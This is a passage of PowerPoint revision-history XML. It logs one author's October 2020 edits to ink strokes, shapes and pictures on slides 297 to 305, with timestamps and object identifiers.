        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:53:26.059" v="7208" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="37" creationId="{A109AA81-5269-4EB0-A713-B749535738C1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:53:25.786" v="7207"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="38" creationId="{6A2CCE07-97B0-406D-9E54-AB93E11F4AF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0" creationId="{AB08FA4D-709B-4A97-9C5B-6636C5D91C02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1" creationId="{54A98585-7CDE-47FC-AE53-5D61AE4A6E9E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:53:44.464" v="7225" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="42" creationId="{AE000162-C1C6-4578-BCCF-ED58B9F783FF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:53:44.019" v="7224" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="43" creationId="{02F43BDE-103E-43D0-8CA9-29F6BEB7F900}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:53:43.722" v="7223"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="44" creationId="{F1604B59-AF11-478F-B853-317B6470799A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6" creationId="{C5126A38-84D2-4D4E-950E-27DF22621BDE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7" creationId="{38CB66AD-5C32-4B76-9880-646510733946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8" creationId="{F7F617C6-70B9-42AE-80E4-B7934AE153B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0" creationId="{96084960-13A3-408E-AE1F-CF0BD08EF405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2" creationId="{1A1E6BFE-78FD-475A-A31E-5245327B5271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3" creationId="{0CD12286-E161-4526-A7A9-7495EEDBDA14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4" creationId="{2C653A5D-FFE6-41C3-8AD6-AF5B29F866E3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6" creationId="{22F411E7-DA29-4EC4-8797-66953FC8474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8" creationId="{D1D23263-5EDC-4D9B-8C9B-50DEACF76602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0" creationId="{B2756A0E-332E-4770-B01F-1C5C22D0A7D4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1" creationId="{180BC456-2E90-47D2-98CE-700E69912100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3" creationId="{AFCEF441-C44D-4218-B875-7EE8A823C78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4" creationId="{EF570743-FFF6-49B4-AF44-82F0D19A4D2C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5" creationId="{8BC4FF01-DBA0-4823-910B-F8570B8ABFE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6" creationId="{CA21C56D-8161-451C-BE18-D125C5E564C3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7" creationId="{163F70B3-3089-4F4B-911C-1CD50EF63D06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8" creationId="{09CA6806-450D-4044-9057-39C91404C7BB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9" creationId="{CF7E43CD-E650-4662-866F-1173D096635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0" creationId="{87E55148-06B9-4B41-8CDC-627379459254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2" creationId="{2189D868-FFDB-4B50-820A-9E9D0851623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3" creationId="{F54A3930-4581-4780-BC77-F37E8A72E01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4" creationId="{8A269916-CB81-4E3F-B119-68C252AE770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5" creationId="{9EE010FF-190F-49CF-95E4-2DE930B30BA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6" creationId="{10D448A9-2EB2-489D-91C3-7C4FDC4674C2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:04.053" v="7261" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="78" creationId="{EADCBF13-CE25-44C7-ACB2-552C7C1D17FE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:07.585" v="7263" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="79" creationId="{0EA7FD64-7247-4DEF-B965-B0A41C6DF342}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:25.948" v="7279" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="80" creationId="{8166D4A6-344F-4E06-9D5F-7D352A290EFC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:25.152" v="7278" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="81" creationId="{FF16DCB8-5273-49EA-BAE0-152B85E54A35}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:24.865" v="7277" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="82" creationId="{7B7CF663-5DD1-44D8-8B1C-018BE574A485}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:17.178" v="7274"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="83" creationId="{8920B436-DA7A-4CBD-B037-FA39DCA3E35E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:15.045" v="7272"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="85" creationId="{598E1F8F-2960-446E-8C1B-3E47C919EC02}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:24.481" v="7276" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="87" creationId="{C8B2B678-101F-4D59-BF4C-45757104B3AD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:55:34.476" v="7283"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="88" creationId="{59D5F6A6-6791-4494-BF4C-C621B2B4B21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0" creationId="{5114CD55-10B4-416A-AA40-38B391F962A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1" creationId="{C87126B1-B4F8-4B5E-982B-681B3308A62D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2" creationId="{5E0B1D39-D2A6-49BD-A1FD-944964FECF1A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4" creationId="{D999C720-484B-4F49-AA00-53C842657A5A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6" creationId="{85D35C59-BE7F-471A-B19F-B3ABFD277C7F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7" creationId="{78013593-5B6B-482B-97D6-5CAD170D3F9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8" creationId="{098FCA25-B656-41ED-86A1-C80D7A8F362B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9" creationId="{308851A7-F57D-47A8-AF0A-622C37A39EA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0" creationId="{D1629600-0C59-4493-8CA8-B70E1D5F1B5C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1" creationId="{85F4E8D4-5081-4CED-A81B-F18B44E25C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2" creationId="{9EEF0E51-8608-4783-9197-DE64266DCC2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3" creationId="{14FE0980-CF0C-4C88-B2CB-DB850BA4080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4" creationId="{1BBDEEC1-2598-4A62-BE00-23B3DA3CD07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5" creationId="{FDEA957A-2DC7-4BD4-89FB-5E6027C9698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7" creationId="{46927796-8F06-4958-9D52-4BA12E71948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8" creationId="{C69EE62A-E7FD-47CF-BE3D-BEF63A08FA25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9" creationId="{684B8008-9603-4CEF-A884-C3429D404B1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0" creationId="{EDB2A07B-83E4-4428-968E-37BF2A2A103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2" creationId="{882A71DD-39F7-46A8-9713-DD50FF76B35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3" creationId="{BB86247B-E670-4FB3-B081-9B5C3CD7D70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4" creationId="{EE767914-7863-4780-8073-BD71054228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5" creationId="{623CAB4A-054F-47C4-8264-1941BB981CB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6" creationId="{046485E8-FA29-42EC-851D-DCBD42E96A8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7" creationId="{2BF42E25-F9FF-43A6-A4D1-573AD64FC3F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9" creationId="{3F3D8BD1-BBAE-46AA-9900-8A1D331595F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0" creationId="{DFF03F3E-285F-4644-A42E-ABF068AC6EE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1" creationId="{BBC6B6D4-9DFF-471A-B680-EF3BB9570A5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2" creationId="{B9F60755-386B-4D12-B927-8E8F82F48A4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3" creationId="{8A50D8EB-1B84-48C8-9DB0-C5E4EBDDCCF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4" creationId="{8C0BA6B3-F1E1-45C7-8414-029758513BFB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6" creationId="{B55207A3-A374-4015-A7A5-8FCB8E45BE54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7" creationId="{493BD16E-3051-4973-ACD9-59CD33ADFCB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8" creationId="{4351119A-0474-4D6F-B2EE-0DCBA2AAA04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9" creationId="{41720971-78AC-4195-8AAB-16E1F6720A3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0" creationId="{65922FF0-F866-4C93-8622-23794B41788D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1" creationId="{9E68722E-C85D-4E35-8A24-8CFD9120DFBC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:56:43.575" v="7330"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711963194" sldId="297"/>
            <ac:inkMk id="133" creationId="{512702C0-DEEA-47C3-9B9A-CBBB318886F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5" creationId="{951CC2CC-92D9-476B-9CE1-5B2B7537B5C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37" creationId="{D8C6EDA1-9D22-4A5D-8081-CDDFFEECE85D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8" creationId="{BEE14759-E634-4132-8ACB-2236CD77F7FB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9" creationId="{03966071-CF77-44EC-AE6C-EEB482D98F53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0" creationId="{5049ABEA-6988-449E-A0AE-913F7D18FA39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1" creationId="{DB50B197-49B1-44CC-8EFD-2ED37A63A75E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2" creationId="{5AC2D382-9889-4CBC-8319-92E63B5A876F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add del mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:23:07.755" v="9029" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3468274754" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:33:10.707" v="7690" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468274754" sldId="298"/>
            <ac:spMk id="2" creationId="{FD705A24-6514-4D75-BE72-6FFCE27C7ACB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:33:23.401" v="7693"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468274754" sldId="298"/>
            <ac:spMk id="3" creationId="{12F88E59-762B-4E4B-815D-4F670D442F8F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20:39:32.153" v="7844"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4212880305" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:33:00.312" v="7672"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299"/>
            <ac:spMk id="25" creationId="{DCEFD931-8671-44B4-A7C5-8D0692D133E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:00:46.281" v="7372" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299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20:39:32.153" v="7844"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299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5:20.951" v="7700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299"/>
            <ac:spMk id="154" creationId="{FE239B8C-A7B0-4BC1-8FE7-6FC74D840D54}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:33:03.229" v="7673" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299"/>
            <ac:grpSpMk id="3" creationId="{F298EA28-4170-40B9-8F3A-B43334C205C0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59" creationId="{DC2108F1-C5EF-4016-A3E6-52F48C766E4B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62" creationId="{B53C2B39-2490-4233-85EA-8401E46EA8A6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11" creationId="{21B78095-942B-44F3-A505-F3D960D92739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51" creationId="{2B972CF4-0920-42CA-B16D-AB10E372F2B8}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T19:58:54.981" v="7347" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4212880305" sldId="299"/>
            <ac:picMk id="26" creationId="{3B9BDA58-B5BA-4213-ADAD-95549D1B87F9}"/>
          </ac:picMkLst>
        </pc:pic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18" creationId="{2191D20F-8DD9-459C-B506-0BAFF1983E0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25" creationId="{1FCC2E36-6890-4928-A02D-A0EDBB43CC7B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2" creationId="{D81EE523-EBFB-4641-A88E-04139F5971F7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3" creationId="{025BCB4D-25BE-41E4-942D-E34152129A6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4" creationId="{93238430-D322-4A75-BC72-A0E3DFE76D84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5" creationId="{538739D6-A5B5-4CDC-99AD-6EAFEC94748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6" creationId="{F7C3CC8F-6D59-4F50-BE0A-50130E10FDE9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7" creationId="{72715A9A-CBA5-41C1-9EB9-36AD4AA1D0F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8" creationId="{71260392-4E1E-4FA7-BB44-404F495A2C5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9" creationId="{610F5C5D-7A19-4A62-9C80-6A88109E0355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0" creationId="{484A0BD8-838A-4F68-9935-A7690C0F9CFF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2" creationId="{77B01E1F-F38B-4281-82B2-EA780631354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3" creationId="{02045682-A759-4B34-A6FA-6ECBBBB15593}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T11:29:38.907" v="12323" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="172233623" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:20:40.453" v="8998" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="172233623" sldId="300"/>
            <ac:spMk id="2" creationId="{848123AA-45F8-478C-BD48-64B782781E52}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:20:26.845" v="8991" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="172233623" sldId="300"/>
            <ac:spMk id="3" creationId="{170F1F03-AD3B-40D4-A9A4-A23B6630DB7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T11:28:48.283" v="12312" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="172233623" sldId="300"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:20:41.548" v="8999" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="172233623" sldId="300"/>
            <ac:spMk id="6" creationId="{330856DB-9606-45C6-B46F-A4E12E5BF3F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T11:29:38.907" v="12323" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="172233623" sldId="300"/>
            <ac:spMk id="7" creationId="{04104634-E1B5-456B-ABF8-39949A2E50F5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:37:55.014" v="7765" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="459518054" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:34:54.234" v="7699" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="459518054" sldId="300"/>
            <ac:spMk id="3" creationId="{1691BE2A-F9D5-44C1-96E6-E3FFE6ED29E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:36:13.451" v="7706" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="459518054" sldId="300"/>
            <ac:spMk id="26" creationId="{5B331CB5-127B-4198-BCD2-547A1881B0E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:36:43.058" v="7737" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="459518054" sldId="300"/>
            <ac:spMk id="93" creationId="{4F19E29C-278A-4806-AAEA-3AE370DFEB95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T20:34:29.966" v="7695" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="459518054" sldId="300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1" creationId="{0E5FF47E-55DB-4621-94DF-35E725470BEE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8" creationId="{54F1E049-6AE6-4136-9ED3-95B1AFF756B5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09:57:19.064" v="10377" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="203430102" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:30:44.492" v="9065" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="203430102" sldId="30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21:50:33.088" v="10284" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="203430102" sldId="301"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T21:19:25.839" v="8977" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="887171388" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T11:18:39.729" v="11858" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="239590548" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:29:13.049" v="11304" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239590548" sldId="302"/>
            <ac:spMk id="2" creationId="{DF7E8C56-17FD-401F-AB86-3178D06650D7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:08:31.036" v="10508" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239590548" sldId="302"/>
            <ac:spMk id="3" creationId="{B1B99A91-7A43-455A-BF61-D89EACBAB13F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:16:49.620" v="16488" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1826571045" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T22:40:58.090" v="10322" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1826571045" sldId="303"/>
            <ac:spMk id="2" creationId="{7DD5344E-0038-4DAC-A1B8-F8FA30DF88AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:04:24.285" v="10379" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="337854660" sldId="304"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:06:46.371" v="10507"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="945803796" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:05:40.515" v="10382" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="945803796" sldId="304"/>
            <ac:spMk id="2" creationId="{16429EF4-4487-42EB-8880-13FA80732D7D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:06:37.323" v="10506" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="945803796" sldId="304"/>
            <ac:spMk id="87" creationId="{E184AA2C-F32F-4DC3-9817-6A6FBEA4A454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:06:08.650" v="10469" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="945803796" sldId="304"/>
            <ac:spMk id="106" creationId="{F6EF0A3E-A303-4467-979B-822EFEE8DF4D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1:03:16.228" v="11632" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4190681715" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:09:33.562" v="10518" actId="700"/>
